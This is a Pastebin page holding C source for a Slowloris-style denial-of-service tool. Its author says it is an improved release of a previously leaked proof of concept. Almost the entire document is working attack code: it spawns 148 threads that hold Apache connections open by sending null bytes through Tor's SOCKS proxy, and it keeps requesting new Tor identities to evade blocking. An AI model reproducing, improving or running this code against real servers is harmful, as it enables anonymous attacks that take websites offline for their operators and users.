API tools faq
paste
Advertisement
Guest User

Slowloris using tor_Code404

a guest
Apr 9th, 2012
790
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 6.08 KB | None | 0 0
raw download clone embed print report
  1. /* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2.  *                  Slowloris with a twist over tor
  3.  * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4.  *
  5.  * Due to the alpha version of this code being leaked I've decided
  6. * to release an improved version to fully show this method of
  7. * attack mostly free of the bugs / dependency on torsocks. This
  8. * attack works on a similar idea of slowloris only it sends packets
  9. * containing a single 0x00 and optionally nothing causing Apache
  10. * to keep the connection alive almost indefinitely.
  11. *
  12. * Due to no one knowing how th3j35t3r's XerXes works I can not say
  13.  * if this is the same method. This was one of my many ideas I was
  14.  * exploring as to how it could possibly work that has some successful
  15.  * results.
  16.  *
  17.  * - SanguineRose / William Welna
  18.  *
  19.  *                        Leaked Version
  20.  *        http://seclists.org/fulldisclosure/2011/Jul/84
  21.  */
  22.  
  23. #include <stdio.h>
  24. #include <stdlib.h>
  25. #include <string.h>
  26. #include <stdint.h>
  27. #include <unistd.h>
  28. #include <netdb.h>
  29. #include <signal.h>
  30. #include <sys/socket.h>
  31. #include <sys/types.h>
  32. #include <netinet/in.h>
  33. #include <arpa/inet.h>
  34. #include <pthread.h>
  35.  
  36. /* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires
  37.  * mass amounts of threads handling only a few connections each, since this is a POC I will leave
  38.  * it up to others to fix that. It also has limited success/attack lengths due to tor being slow
  39.  */
  40. #define CONNECTIONS 3
  41. #define THREADS 148
  42.  
  43. typedef struct {
  44.     const char *host, *port;
  45. } thread_args;
  46.  
  47. // Simple debug function
  48. void dump_array(char *name, char *data, int size) {
  49.     int x, z, indent = strlen(name) + 2;
  50.     fprintf(stderr, "%s { ", name);
  51.     for(x=0; x < size; x++) {
  52.         for(z=0; z < indent; z++)
  53.             putc(0x20, stderr);
  54.         fprintf(stderr, "%20x\n", data[x]);
  55.     }
  56.     fprintf(stderr, "};\n");
  57. }
  58.  
  59. int make_socket(const char *host, const char *port) {
  60.     struct addrinfo hints, *servinfo, *p;
  61.     int sock, r, y=1;
  62.     memset(&hints, 0, sizeof(hints));
  63.     hints.ai_family = AF_UNSPEC;
  64.     hints.ai_socktype = SOCK_STREAM;
  65.     if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
  66.         fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
  67.         return -1;
  68.     }
  69.     for(p = servinfo; p != NULL; p = p->ai_next) {
  70.         if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
  71.             continue;
  72.         }
  73.         setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
  74.         if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
  75.             close(sock);
  76.             continue;
  77.         }
  78.         break;
  79.     }
  80.     if(p == NULL) {
  81.         if(servinfo)
  82.             freeaddrinfo(servinfo);
  83.         return -2;
  84.     }
  85.     if(servinfo)
  86.         freeaddrinfo(servinfo);
  87.     return sock;
  88. }
  89.  
  90. /* Opens SOCKS5 connection to tor
  91.  * I also dedicate this function to pr0f <3
  92.  */
  93. int pr0f_loves_me_tor_connect(const char *host, const char *port) {
  94.     char *buf = calloc(1024, sizeof(char));
  95.     short l = strlen(host), t;
  96.     int x, sock;
  97.     fprintf(stderr, "[Connect %s:%s]\n", host, port);
  98.     if((sock=make_socket("127.0.0.1", "9050"))<0) {
  99.         free(buf);
  100.         return sock;
  101.     }
  102.     write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain
  103.     read(sock, buf, 1024);
  104.     if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
  105.         free(buf);
  106.         return -3; // Auth not accepted by socks server / wrong version
  107.     }
  108.     buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l;
  109.     for(x=0; x < l; x++)
  110.         buf[5+x] = host[x];
  111.     x=l+5;
  112.     t = htons(atoi(port));
  113.     memcpy((buf+x), &t, 2);
  114.     //dump_array("final_request", buf, x+2);
  115.     write(sock, buf, x+2);// send request
  116.     read(sock, buf, 1024);
  117.     if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success
  118.         free(buf);
  119.         return sock;
  120.     }
  121.     free(buf);
  122.     return -4; // Unable to conect
  123. }
  124.  
  125. // This is for the SIGPIPE error on bad connections / premature closing
  126. void broke(int s) {
  127.     // do nothing
  128. }
  129.  
  130. void *attack(void *arg) {
  131.     thread_args *a = (thread_args *)arg;
  132.     int x, r, socks[CONNECTIONS];
  133.     fprintf(stderr, "[Thread Started]\n");
  134.     for(x=0; x < CONNECTIONS; x++)
  135.         socks[x]=0;
  136.     signal(SIGPIPE, &broke);
  137.     while(1) {
  138.         for(x=0; x < CONNECTIONS; x++) {
  139.             if(socks[x] <= 0) {
  140.                 socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
  141.                 fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
  142.             }
  143.             if(write(socks[x], "\0", 1) < 0) {
  144.                 close(socks[x]);
  145.                 fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]);
  146.                 socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
  147.             }
  148.         }
  149.         usleep(100000);
  150.     }
  151. }
  152.  
  153. void do_help(char *n) {
  154.     fprintf(stderr, "Usage: %s <ip/hostname> <port>\n");
  155.     exit(0);
  156. }
  157.  
  158. void *cycle_identity() {
  159.     int sock = make_socket("localhost", "9051");
  160.     char *shit_bucket = calloc(1024, sizeof(char));
  161.     if(sock < 0) {
  162.         fprintf(stderr, "Can't connect to tor control port\n");
  163.         free(shit_bucket);
  164.         pthread_exit(NULL);
  165.     }
  166.     write(sock, "AUTHENTICATE \"\"\n", 16);
  167.     while(1) {
  168.         write(sock, "signal NEWNYM\n", 15);
  169.         fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
  170.         read(sock, shit_bucket, 1024);
  171.         sleep(5);
  172.     }
  173. }
  174.  
  175. int main(int argc, char **argv) {
  176.     pthread_t threads[THREADS];
  177.     pthread_t cycle_tid;
  178.     thread_args arg;
  179.     void *status;
  180.     int x;
  181.     if(argc != 3)
  182.         do_help(argv[0]);
  183.     arg.host = (const char *)argv[1];
  184.     arg.port = (const char *)argv[2];
  185.     pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
  186.     for(x=0; x < THREADS; x++) {
  187.         pthread_create(&threads[x], NULL, attack, &arg);
  188.         usleep(200000);
  189.     }
  190.     for(x=0; x < THREADS; x++)
  191.         pthread_join(threads[x], &status);
  192.     pthread_kill(cycle_tid, 15);
  193.     pthread_exit(NULL);
  194.     return 0;
  195. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!